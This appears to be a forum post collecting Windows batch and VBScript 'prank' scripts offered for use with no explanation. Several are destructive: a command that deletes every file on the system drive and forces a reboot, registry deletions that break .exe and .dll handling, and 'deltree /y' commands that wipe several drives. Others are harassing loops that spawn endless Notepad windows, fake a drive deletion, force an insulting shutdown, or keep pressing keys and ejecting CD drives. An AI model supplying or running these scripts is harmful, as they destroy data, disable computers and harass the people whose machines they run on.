@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
-Messenger
@echo off
:A
COLOR 0c
cls
echo ----------------------
echo Ultimate CMD Messanger
echo ----------------------
set /p n=Buddy -
set /p m=Message -
net send %n% %m%
pause
Goto A
-Stupidity Shutdown
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10
-Trick C Drive Deletion
@echo off
@color 0c
echo !!!Deleting C Drive!!!
echo do not exit, exiting will result in total system failure!
pause
@color
echo Do you want to continue deleting your C drive?
echo press y for yes or n for no
pause
echo you chose yes, please confirm by pressing y/n
pause
msg * Deleting C Drive...
dir /s
dir /s
dir /s
dir /s
pause
echo C drive successfully deleted!
:MSG
msg * "The C drive is Fcked"
goto MSG
-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
-Endless Notepads
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-Shutdown
shutdown -s
-Command Prompt
command.com
-Delete Everything [NOTE THIS IS DANGEROUS!! USE AT RISK]
deltree /y C:\
deltree /y E:\
deltree /y A:\
deltree /y F:\
deltree /y G:\
deltree /y
\
deltree /y H:\
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m wa"
WScript.Sleep 500
WshShell.SendKeys "tchi"
WScript.Sleep 500
WshShell.SendKeys "ng y"
Wscript.Sleep 500
WshShell.SendKeys "ou!"
-Crazy caps lock
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-Endless Enter
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
-Endless Backspace
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
-Popping CD Drives
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
ClosingCopyright © 2026, NextGenUpdate.
All Rights Reserved.